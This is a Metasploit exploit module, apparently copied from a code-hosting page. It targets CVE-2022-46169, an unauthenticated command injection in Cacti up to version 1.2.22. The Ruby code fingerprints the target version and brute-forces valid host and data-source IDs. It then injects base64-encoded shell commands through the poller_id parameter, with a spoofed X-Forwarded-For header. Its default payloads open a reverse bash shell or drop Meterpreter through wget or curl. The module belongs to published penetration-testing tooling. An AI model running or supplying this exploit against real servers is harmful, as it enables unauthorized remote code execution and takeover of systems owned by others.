Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::CmdStager
11
  prepend Msf::Exploit::Remote::AutoCheck
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Cacti 1.2.22 unauthenticated command injection',
18
        'Description' => %q{
19
          This module exploits an unauthenticated command injection
20
          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in
21
          order to achieve unauthenticated remote code execution as the
22
          www-data user.
23

24
          The module first attempts to obtain the Cacti version to see
25
          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID
26
          are not set, the module will try to bruteforce the missing
27
          value(s). If a valid combination is found, the module will
28
          use these to attempt exploitation. If LOCAL_DATA_ID and/or
29
          HOST_ID are both set, the module will immediately attempt
30
          exploitation.
31

32
          During exploitation, the module sends a GET request to
33
          /remote_agent.php with the action parameter set to polldata
34
          and the X-Forwarded-For header set to the provided value for
35
          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the
36
          poller_id parameter is set to the payload and the host_id
37
          and local_data_id parameters are set to the bruteforced or
38
          provided values. If X_FORWARDED_FOR_IP is set to an address
39
          that is resolvable to a hostname in the poller table, and the
40
          local_data_id and host_id values are vulnerable, the payload
41
          set for poller_id will be executed by the target.
42

43
          This module has been successfully tested against Cacti
44
          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)
45
        },
46
        'License' => MSF_LICENSE,
47
        'Author' => [
48
          'Stefan Schiller', # discovery (independent of Steven Seeley)
49
          'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller)
50
          'Owen Gong', # @phithon_xg - vulhub PoC
51
          'Erik Wynter' # @wyntererik - Metasploit
52
        ],
53
        'References' => [
54
          ['CVE', '2022-46169'],
55
          ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details
56
          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC
57
          ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller
58
        ],
59
        'DefaultOptions' => {
60
          'RPORT' => 8080
61
        },
62
        'Platform' => %w[unix linux],
63
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
64
        'Targets' => [
65
          [
66
            'Automatic (Unix In-Memory)',
67
            {
68
              'Platform' => 'unix',
69
              'Arch' => ARCH_CMD,
70
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
71
              'Type' => :unix_memory
72
            }
73
          ],
74
          [
75
            'Automatic (Linux Dropper)',
76
            {
77
              'Platform' => 'linux',
78
              'Arch' => [ARCH_X86, ARCH_X64],
79
              'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'],
80
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
81
              'Type' => :linux_dropper
82
            }
83
          ]
84
        ],
85
        'Privileged' => false,
86
        'DisclosureDate' => '2022-12-05',
87
        'DefaultTarget' => 1,
88
        'Notes' => {
89
          'Stability' => [ CRASH_SAFE ],
90
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
91
          'Reliability' => [ REPEATABLE_SESSION ]
92
        }
93
      )
94
    )
95

96
    register_options([
97
      OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),
98
      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),
99
      OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),
100
      OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])
101
    ])
102

103
    register_advanced_options([
104
      OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),
105
      OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),
106
      OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),
107
      OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])
108
    ])
109
  end
110

111
  def check
112
    # sanity check to see if the target is likely Cacti
113
    res = send_request_cgi({
114
      'method' => 'GET',
115
      'uri' => normalize_uri(target_uri.path)
116
    })
117

118
    unless res
119
      return CheckCode::Unknown('Connection failed.')
120
    end
121

122
    unless res.code == 200 && res.body.include?('<title>Login to Cacti')
123
      return CheckCode::Safe('Target is not a Cacti application.')
124
    end
125

126
    # get the version
127
    version = res.body.scan(/Version (.*?) \| \(c\)/)&.flatten&.first
128
    if version.blank?
129
      return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.')
130
    end
131

132
    begin
133
      if Rex::Version.new(version) <= Rex::Version.new('1.2.22')
134
        return CheckCode::Appears("The target is Cacti version #{version}")
135
      else
136
        return CheckCode::Safe("The target is Cacti version #{version}")
137
      end
138
    rescue StandardError => e
139
      return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}")
140
    end
141
  end
142

143
  def exploitable_rrd_names
144
    [
145
      'apache_total_kbytes',
146
      'apache_total_hits',
147
      'apache_total_hits',
148
      'apache_total_kbytes',
149
      'apache_cpuload',
150
      'boost_avg_size',
151
      'boost_peak_memory',
152
      'boost_records',
153
      'boost_table',
154
      'ExportDuration',
155
      'ExportGraphs',
156
      'syslogRuntime',
157
      'tholdRuntime',
158
      'polling_time',
159
      'uptime',
160
    ]
161
  end
162

163
  def brute_force_ids
164
    # perform a sanity check first
165
    if @host_id
166
      host_ids = [@host_id]
167
    else
168
      if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID']
169
        fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')
170
      end
171
      host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a
172
    end
173

174
    if @local_data_id
175
      local_data_ids = [@local_data_ids]
176
    else
177
      if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID']
178
        fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')
179
      end
180
      local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a
181
    end
182

183
    # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id
184
    max_attempts = host_ids.length * local_data_ids.length
185
    if max_attempts > 1000
186
      fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.')
187
    end
188

189
    potential_targets = []
190
    request_ct = 0
191

192
    print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations")
193
    host_ids.each do |h_id|
194
      print_status("Enumerating local_data_id values for host_id #{h_id}")
195
      local_data_ids.each do |ld_id|
196
        request_ct += 1
197
        print_status("Performing request #{request_ct}...") if request_ct % 25 == 0
198

199
        res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000)))
200
        unless res
201
          print_error('No response received. Aborting bruteforce')
202
          return nil
203
        end
204

205
        unless res.code == 200
206
          print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")
207
          return nil
208
        end
209

210
        begin
211
          parsed_response = JSON.parse(res.body)
212
        rescue JSON::ParserError
213
          print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce")
214
          return nil
215
        end
216

217
        unless parsed_response.is_a?(Array)
218
          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")
219
          return nil
220
        end
221

222
        # the array can be empty, which is not an error but just means the local_data_id is not exploitable
223
        next if parsed_response.empty?
224

225
        first_item = parsed_response.first
226
        unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) }
227
          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")
228
          return nil
229
        end
230

231
        # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array
232
        # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it
233
        # in addition, some data source types have an empty rrd_name but are still exploitable
234
        # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it
235
        # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end
236
        # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options
237
        rrd_name = first_item['rrd_name']
238
        if rrd_name.empty?
239
          potential_targets << [h_id, ld_id]
240
        elsif exploitable_rrd_names.include?(rrd_name)
241
          print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")
242
          return [h_id, ld_id]
243
        else
244
          next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on
245
        end
246
      end
247
    end
248

249
    return nil if potential_targets.empty?
250

251
    # inform the user about potential targets
252
    print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:")
253
    potential_targets.each do |h_id, ld_id|
254
      print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}")
255
    end
256
    print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options')
257
    nil
258
  end
259

260
  def execute_command(cmd, _opts = {})
261
    # use base64 encoding to get around special char limitations
262
    cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`"
263
    send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0)
264
  end
265

266
  def exploit
267
    @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present?
268
    @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present?
269

270
    unless @host_id && @local_data_id
271
      brute_force_result = brute_force_ids
272
      unless brute_force_result
273
        fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.')
274
      end
275
      @host_id, @local_data_id = brute_force_result
276
    end
277

278
    if target.arch.first == ARCH_CMD
279
      print_status('Executing the payload. This may take a few seconds...')
280
      execute_command(payload.encoded)
281
    else
282
      execute_cmdstager(background: true)
283
    end
284
  end
285

286
  def remote_agent_request(ld_id, h_id, poller_id)
287
    {
288
      'method' => 'GET',
289
      'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),
290
      'headers' => {
291
        'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP']
292
      },
293
      'vars_get' => {
294
        'action' => 'polldata',
295
        'local_data_ids[0]' => ld_id,
296
        'host_id' => h_id,
297
        'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload
298
      }
299
    }
300
  end
301
end
302

303